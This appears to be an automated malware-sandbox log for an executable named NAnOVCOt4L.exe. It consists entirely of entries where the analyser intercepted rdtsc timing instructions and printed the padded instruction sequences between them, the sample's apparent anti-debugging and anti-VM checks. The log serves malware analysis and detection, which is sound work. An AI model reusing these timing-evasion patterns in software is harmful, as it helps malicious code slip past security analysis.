Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22D788 second address: 22D78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22DB13 second address: 22DB23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22DB23 second address: 22DB43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e je 00007F6035561AD6h 0x00000014 jmp 00007F6035561ADBh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22DB43 second address: 22DB48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26DD67 second address: 26DD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26DEF6 second address: 26DF07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26DF07 second address: 26DF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6035561ADEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26DF1B second address: 26DF2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26DF2F second address: 26DF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26DF33 second address: 26DF54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F6034D241E9h 0x00000011 pushad 0x00000012 jl 00007F6034D241C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26E0AB second address: 26E0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26E0AF second address: 26E0B9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6034D241C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26E4F6 second address: 26E4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26E4FA second address: 26E4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26E4FE second address: 26E51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6035561AE6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26E51A second address: 26E520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26E520 second address: 26E524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2726C4 second address: 2726CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2726CA second address: 2726CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2726CF second address: 2726DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F6034D241C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2726DA second address: 2726E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2726E2 second address: 2726EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 276273 second address: 276289 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6035561AD6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F6035561AD6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 275C10 second address: 275C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 275C14 second address: 275C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 275C18 second address: 275C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 275C1E second address: 275C3C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6035561ADAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F6035561B12h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 jnc 00007F6035561AD6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 275C3C second address: 275C56 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6034D241C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6034D241CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 275C56 second address: 275C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 275E0E second address: 275E33 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F6034D241D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 27C321 second address: 27C325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 27C325 second address: 27C351 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6034D241C6h 0x00000008 jp 00007F6034D241C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F6034D241D9h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 27C351 second address: 27C356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 27BD68 second address: 27BDA0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F6034D241D4h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F6034D241CCh 0x00000017 jno 00007F6034D241CEh 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 ja 00007F6034D241C6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 282675 second address: 282687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 js 00007F6035561AD6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 281398 second address: 2813A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2813A4 second address: 2813A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22D5E2 second address: 22D5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 281924 second address: 28192A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28192A second address: 28192E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2822DC second address: 2822E6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6035561AD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2822E6 second address: 2822F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2822F1 second address: 28230C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6035561AE3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 285DF5 second address: 285E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 js 00007F6034D241CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 285E04 second address: 285E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 285E08 second address: 285E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28D305 second address: 28D318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F6035561AD6h 0x0000000c jnl 00007F6035561AD6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28D318 second address: 28D326 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6034D241C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28D326 second address: 28D32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28D32A second address: 28D32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28D32E second address: 28D340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28B432 second address: 28B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28B43C second address: 28B442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28B59A second address: 28B5B2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F6034D241CEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 jns 00007F6034D241C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28B5B2 second address: 28B5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28B5B8 second address: 28B5CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28B5CA second address: 28B5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28B861 second address: 28B869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28BEA9 second address: 28BEC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6035561AE1h 0x00000009 jo 00007F6035561AD6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28BEC4 second address: 28BEEA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F6034D241F8h 0x00000012 push eax 0x00000013 jmp 00007F6034D241CEh 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28BEEA second address: 28BEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6035561ADAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28BEF8 second address: 28BEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28BEFC second address: 28BF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28C1FF second address: 28C228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6034D241D2h 0x0000000b popad 0x0000000c jmp 00007F6034D241D0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28C228 second address: 28C22E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28C7D1 second address: 28C7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6034D241CEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28CD35 second address: 28CD3F instructions: 0x00000000 rdtsc 0x00000002 js 00007F6035561ADCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28CD3F second address: 28CD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28CD46 second address: 28CD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28CD4C second address: 28CD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28CD52 second address: 28CD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 28CD5D second address: 28CD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6034D241D2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F6034D241C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 291536 second address: 29153A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29153A second address: 291556 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6034D241D2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 291556 second address: 29155C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29155C second address: 291560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 291560 second address: 291564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2916C2 second address: 2916E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D9h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F6034D241C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 291869 second address: 29187B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6035561ADCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29187B second address: 291881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 291881 second address: 2918AE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6035561AD6h 0x00000008 jmp 00007F6035561AE9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 293348 second address: 293352 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6034D241C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 293352 second address: 29335C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29335C second address: 293360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 294996 second address: 2949A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F6035561AD6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2949A3 second address: 2949A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 298ECF second address: 298EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 jl 00007F6035561AF6h 0x0000000f pushad 0x00000010 jl 00007F6035561AD6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29EB22 second address: 29EB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29F0F3 second address: 29F105 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F6035561AD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29F2B4 second address: 29F2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29F2BA second address: 29F2C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jl 00007F6035561AD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 29F571 second address: 29F58B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6034D241D5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2A0317 second address: 2A0320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2A7A37 second address: 2A7A44 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2A7A44 second address: 2A7A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1E0DEB second address: 1E0DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2B7A1B second address: 2B7A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2B7A22 second address: 2B7A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6034D241C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2BD953 second address: 2BD959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
